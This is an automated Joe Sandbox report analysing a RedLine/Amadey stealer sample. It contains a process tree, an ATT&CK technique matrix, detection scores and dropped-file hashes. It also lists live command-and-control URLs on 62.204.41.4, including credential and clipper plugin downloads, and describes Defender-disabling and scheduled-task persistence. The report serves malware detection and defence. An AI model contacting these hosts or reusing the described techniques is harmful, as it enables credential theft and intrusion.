                              Source: Yara matchFile source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid Accounts3
                              Native API
                              1
                              Windows Service
                              2
                              Bypass User Access Control
                              21
                              Disable or Modify Tools
                              1
                              Input Capture
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              Exfiltration Over Other Network Medium14
                              Ingress Tool Transfer
                              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                              System Shutdown/Reboot
                              Default Accounts2
                              Command and Scripting Interpreter
                              1
                              Scheduled Task/Job
                              1
                              Access Token Manipulation
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              Account Discovery
                              Remote Desktop Protocol1
                              Input Capture
                              Exfiltration Over Bluetooth2
                              Encrypted Channel
                              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain Accounts1
                              Scheduled Task/Job
                              1
                              Registry Run Keys / Startup Folder
                              1
                              Windows Service
                              2
                              Obfuscated Files or Information
                              Security Account Manager3
                              File and Directory Discovery
                              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                              Non-Application Layer Protocol
                              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local Accounts1
                              Service Execution
                              1
                              Services File Permissions Weakness
                              111
                              Process Injection
                              2
                              Software Packing
                              NTDS36
                              System Information Discovery
                              Distributed Component Object ModelInput CaptureScheduled Transfer113
                              Application Layer Protocol
                              SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon Script1
                              Scheduled Task/Job
                              1
                              Timestomp
                              LSA Secrets131
                              Security Software Discovery
                              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.common1
                              Registry Run Keys / Startup Folder
                              2
                              Bypass User Access Control
                              Cached Domain Credentials21
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup Items1
                              Services File Permissions Weakness
                              1
                              Masquerading
                              DCSync2
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              System Owner/User Discovery
                              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                              Access Token Manipulation
                              /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                              Process Injection
                              Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                              Services File Permissions Weakness
                              Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                              Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                              Rundll32
                              KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 799672 Sample: file.exe Startdate: 06/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 8 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 4 other processes 2->16 process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\brJg.exe, PE32 9->57 dropped 18 brJg.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\arJf.exe, PE32 18->51 dropped 73 Multi AV Scanner detection for dropped file 18->73 75 Machine Learning detection for dropped file 18->75 24 arJf.exe 9 1 18->24         started        27 nika.exe 1 1 18->27         started        53 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->53 dropped 77 Contains functionality to inject code into remote processes 22->77 29 mnolyk.exe 18 22->29         started        signatures7 process8 dnsIp9 79 Detected unpacking (changes PE section rights) 24->79 81 Detected unpacking (overwrites its own PE header) 24->81 83 Disable Windows Defender notifications (registry) 24->83 85 Disable Windows Defender real time protection (registry) 24->85 63 62.204.41.4, 49724, 49725, 49726 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 29->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 29->61 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Creates an undocumented autostart registry key 29->89 91 Machine Learning detection for dropped file 29->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 29->93 33 cmd.exe 1 29->33         started        35 schtasks.exe 1 29->35         started        37 rundll32.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              file.exe69%ReversingLabsWin32.Spyware.RedLine
                              file.exe51%VirustotalBrowse
                              file.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe49%ReversingLabsWin32.Trojan.Tedy
                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe28%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                              C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://62.204.41.4/Gol478Ns/index.php79e5342a20%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%Avira URL Cloudsafe
                              http://62.204.41.4/Golol478Ns/index.php0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dll60%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpz0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phprosoft0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dll2%VirustotalBrowse
                              http://62.204.41.4/Gol478Ns/index.php$0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpK0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpL0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpn0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpi0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpT0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dllA0%Avira URL Cloudsafe
                              62.204.41.4/Gol478Ns/index.php0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%Avira URL Cloudmalware
                              http://62.204.41.4/Gol478Ns/index.php/0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpQ0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.phpp0%Avira URL Cloudsafe
                              http://62.204.41.4/Gol478Ns/index.php0%Avira URL Cloudsafe
                              No contacted domains info
                              NameMaliciousAntivirus DetectionReputation
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                              • Avira URL Cloud: malware
                              unknown
                              62.204.41.4/Gol478Ns/index.phptrue
                              • Avira URL Cloud: safe
                              low
                              http://62.204.41.4/Gol478Ns/index.phptrue
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://62.204.41.4/Golol478Ns/index.phpmnolyk.exe, 0000000F.00000002.775467476.0000000001182000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php79e5342a2mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/Plugins/clip64.dll6mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpzmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phprosoftmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php$mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpKmnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpLmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpnmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpimnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpTmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/Plugins/cred64.dllAmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.php/mnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phppmnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://62.204.41.4/Gol478Ns/index.phpQmnolyk.exe, 0000000F.00000002.775467476.00000000010FA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              62.204.41.4
                              unknownUnited Kingdom
                              30798TNNET-ASTNNetOyMainnetworkFItrue
                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:799672
                              Start date and time:2023-02-06 18:33:46 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:34
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample file name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 63.2% (good quality ratio 60.5%)
                              • Quality average: 85%
                              • Quality standard deviation: 24.3%
                              HCA Information:
                              • Successful, ratio: 90%
                              • Number of executed functions: 100
                              • Number of non-executed functions: 116
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for rundll32
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              18:35:55API Interceptor2091x Sleep call for process: mnolyk.exe modified
                              18:35:56Task SchedulerRun new task: mnolyk.exe path: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              62.204.41.4file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              QEb6ybdVBd.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              9U2j7fIA6J.exeGet hashmaliciousBrowse
                              • 62.204.41.4/Gol478Ns/index.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              TNNET-ASTNNetOyMainnetworkFIfile.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              d5Mz8LcQ40.exeGet hashmaliciousBrowse
                              • 62.204.41.5
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              4tZ5R2O8ru.exeGet hashmaliciousBrowse
                              • 62.204.41.5
                              Z7MMw0PTfb.exeGet hashmaliciousBrowse
                              • 62.204.41.5
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              cGvwe523RO.exeGet hashmaliciousBrowse
                              • 62.204.41.170
                              file.exeGet hashmaliciousBrowse
                              • 62.204.41.4
                              9Nn6GvGMz1.exeGet hashmaliciousBrowse
                              • 62.204.41.170
                              07wuYH0G0l.exeGet hashmaliciousBrowse
                              • 62.204.41.170
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllfile.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    QEb6ybdVBd.exeGet hashmaliciousBrowse
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.354940450065058
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                      MD5:B10E37251C5B495643F331DB2EEC3394
                                                                      SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                      SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                      SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):321
                                                                      Entropy (8bit):5.355221377978991
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                      MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                                      SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                      SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                                      SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: QEb6ybdVBd.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):395776
                                                                      Entropy (8bit):7.700821822499256
                                                                      Encrypted:false
                                                                      SSDEEP:6144:Kuy+bnr+Fp0yN90QEdou/MT3yfKRhwgGBP4dN4KuggSKDOjqrYy+znugWIP7FNs+:yMrpy90XMT3ySo9Q/4PSzF/FN0n/tm
                                                                      MD5:E61222B4D82A6007A553851456BCC651
                                                                      SHA1:3EFB6A00C37F1419CC454C7E37F183BB25239DE6
                                                                      SHA-256:A29FD1E2D980E7B3502DEFA0A7184C7E2947055F95396D887294E28D51185690
                                                                      SHA-512:D8B0B2B0088E5CA58045140F9B8CB7681EB5AFFAEA2AC015E4B85911F7C0E4E57B4687BA5913A21F1221FD375ACBBB3A293EB0EE0F8B7008B85D320E45A3DF27
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 49%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................`....../x....@...... ......................................d....................P..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
